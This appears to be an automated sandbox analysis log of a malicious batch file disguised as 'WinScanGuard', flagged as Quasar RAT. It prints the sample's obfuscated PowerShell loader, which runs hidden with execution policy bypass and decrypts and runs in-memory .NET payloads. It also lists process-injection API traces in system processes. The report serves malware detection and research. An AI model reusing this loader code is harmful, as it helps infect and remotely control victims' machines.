              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F6BE0
              Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_0000024287882178
              Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_000002428788B0D0
              Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_000002428788F398
              Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_000002428788B2DC
              Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_00000242878916F8
              Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_00000242878B2D78
              Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_00000242878BBCD0
              Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_00000242878BFF98
              Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_00000242878BBEDC
              Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_00000242878C22F8
              Source: C:\Windows\System32\dllhost.exe | Code function: 22_2_0000000140001B30
              Source: C:\Windows\System32\dllhost.exe | Code function: 22_2_000000014000119C
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC6216F8
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC61B2DC
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC61F398
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC61B0D0
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC612178
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC6522F8
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC64BEDC
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC64FF98
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC64BCD0
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC642D78
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC6816F8
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC67B2DC
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC67F398
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC67B0D0
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC672178
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC7016F8
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC6FB2DC
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC6FF398
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC6FB0D0
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC6F2178
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC7616F8
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC75B2DC
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC75F398
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC75B0D0
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC752178
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC7C16F8
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC7BB2DC
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC7BF398
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC7BB0D0
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC7B2178
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC81B2DC
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC8216F8
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC81F398
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC812178
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC81B0D0
              Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0ABF398
              Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0AC16F8
              Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0ABB2DC
              Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0AB2178
              Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0ABB0D0
              Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0AEFF98
              Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0AF22F8
              Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0AEBEDC
              Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0AE2D78
              Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0AEBCD0
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Code function: 26_2_0400EDD1
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Code function: 26_2_0402F9D1
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A6612E16F8
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A6612DF398
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A6612DB2DC
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A6612D2178
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A6612DB0D0
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A6613122F8
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A66130FF98
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A66130BEDC
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A661302D78
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A66130BCD0
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A6613722F8
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A66136FF98
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A66136BEDC
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A661362D78
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A66136BCD0
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAF1E16F8
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAF1DB2DC
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAF1DB0D0
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAF1D2178
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAF1DF398
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAF20B2DC
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAF2116F8
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAF20B0D0
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAF202178
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAAF20F398
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB14BBCD0
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB14B2D78
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB14BFF98
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB14BBEDC
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB14C22F8
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB14EB0D0
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB14E2178
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB14EF398
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB14EB2DC
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB14F16F8
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB154B0D0
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB1542178
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB154F398
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB15516F8
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB154B2DC
              Source: C:\Windows\System32\svchost.exe | Code function: 31_2_0000026A879CB0D0
              Source: C:\Windows\System32\svchost.exe | Code function: 31_2_0000026A879CF398
              Source: C:\Windows\System32\svchost.exe | Code function: 31_2_0000026A879CB2DC
              Source: C:\Windows\System32\svchost.exe | Code function: 31_2_0000026A879D16F8
              Source: C:\Windows\System32\svchost.exe | Code function: 31_2_0000026A879C2178
              Source: C:\Windows\System32\svchost.exe | Code function: 31_2_0000026A87F4BCD0
              Source: C:\Windows\System32\svchost.exe | Code function: 31_2_0000026A87F4FF98
              Source: C:\Windows\System32\svchost.exe | Code function: 31_2_0000026A87F522F8
              Source: C:\Windows\System32\svchost.exe | Code function: 31_2_0000026A87F4BEDC
              Source: C:\Windows\System32\svchost.exe | Code function: 31_2_0000026A87F42D78
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000017953772178
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000001795377B0D0
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000001795377F398
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000179537816F8
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000001795377B2DC
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000179537A2D78
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000179537ABCD0
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000179537AFF98
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000179537B22F8
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000179537ABEDC
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000017953D42D78
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000017953D4BCD0
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000017953D4FF98
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000017953D522F8
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000017953D4BEDC
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615504224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList
              Source: C:\Windows\$sxr-mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\$sxr-mshta.exe | Section loaded: sfc.dll
              Source: 18.2.$sxr-powershell.exe.285393991b8.13.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 18.2.$sxr-powershell.exe.285393991b8.13.raw.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 18.2.$sxr-powershell.exe.28539411228.18.raw.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 18.2.$sxr-powershell.exe.285393c11f0.19.raw.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 18.2.$sxr-powershell.exe.28539411228.18.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 18.2.$sxr-powershell.exe.285393c11f0.19.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000012.00000002.3104746555.0000028539051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | File created: C:\Windows\$sxr-powershell.exe
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF61550898C NtQueryInformationToken
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615521538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6155089E4 NtQueryInformationToken,NtQueryInformationToken
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615508114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF61551BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6155088C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615507FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
              Source: C:\Windows\SysWOW64\dllhost.exe | Code function: 23_2_004015C1 OpenProcess,NtQueryInformationProcess,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC642AF4 NtEnumerateValueKey,OpenMutexW,CloseHandle,FindCloseChangeNotification,NtEnumerateValueKey
              Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0AE221C NtQuerySystemInformation,StrCmpNIW
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB14B2AF4 NtEnumerateValueKey,OpenMutexW,CloseHandle
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285788055.0000020CA1B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C8051D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCSStub2.exe0 vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285032573.0000020CA1950000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCEVM.exe* vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2282758110.0000020C9FA75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2282343313.0000020C9FA10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000000.1726189451.00007FF60EB09000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285788055.0000020CA1A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe.0.drBinary or memory string: OriginalFilenamePowerShell.EXEj% vs WinScanGuard_v.2.1.bat
              Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
              Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@49/18@1/1
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,16_2_00007FF6154F32B0
              Source: C:\Windows\System32\dllhost.exeCode function: 22_2_0000000140001B30 LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification,FindResourceA,RegCreateKeyExW,RegSetKeySecurity,RegCreateKeyExW,RegSetValueExW,RegCloseKey,CreateThread,CreateThread,SleepEx,22_2_0000000140001B30
              Source: C:\Windows\$sxr-powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWX04//4DGnhGl+/sl+WZ0=');$iBFKh = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBFKh, 0, $iBFKh.Length);$iBFKh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iBFKh);$sRLEH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NPfQRzZslsp7LUVLS08LhQ==');$sRLEH = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sRLEH, 0, $sRLEH.Length);$sRLEH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sRLEH);$sLsEZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bw6rZXASWFOFrL4CLrePaw==');$sLsEZ = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sLsEZ, 0, $sLsEZ.Length);$sLsEZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sLsEZ);$SPFoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QYOQkrgRiSqCZw4PoX3ndQ==');$SPFoS = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SPFoS, 0, $SPF
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WinScanGuard_v.2.1.bat" "
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile read: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe "WinScanGuard_v.2.1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oLSgt($QHQwZ){ $FhDgh=[System.Security.Cryptography.Aes]::Create(); $FhDgh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FhDgh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FhDgh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ONJSi5FjJzv4AOEMBvugvr4ituUVmgVNRnjeJyrP0WQ='); $FhDgh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CLQNYwl0vsdfD4X+5YKrxQ=='); $SpFlB=$FhDgh.CreateDecryptor(); $return_var=$SpFlB.TransformFinalBlock($QHQwZ, 0, $QHQwZ.Length); $SpFlB.Dispose(); $FhDgh.Dispose(); $return_var;}function rnHmS($QHQwZ){ $WxVgK=New-Object System.IO.MemoryStream(,$QHQwZ); $bpCBe=New-Object System.IO.MemoryStream; $coUVU=New-Object System.IO.Compression.GZipStream($WxVgK, [IO.Compression.CompressionMode]::Decompress); $coUVU.CopyTo($bpCBe); $coUVU.Dispose(); $WxVgK.Dispose(); $bpCBe.Dispose(); $bpCBe.ToArray();}function ZAtIe($QHQwZ,$cjUqy){ $oSPmD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$QHQwZ); $xWTDt=$oSPmD.EntryPoint; $xWTDt.Invoke($null, $cjUqy);}$YlWDR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\WinScanGuard_v.2.1.bat').Split([Environment]::NewLine);foreach ($XUIQg in $YlWDR) { if ($XUIQg.StartsWith('SEROXEN')) { $sOgSv=$XUIQg.Substring(7); break; }}$ZErMU=[string[]]$sOgSv.Split('\');$tzgBc=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[0])));$TtDxt=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[1])));ZAtIe $TtDxt (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZAtIe $tzgBc (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{17980c38-011a-4e2a-a8da-a3b9e80db269}
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{6ee5d1df-df32-414a-8053-43a03a04def5}
              Source: C:\Windows\SysWOW64\dllhost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 144
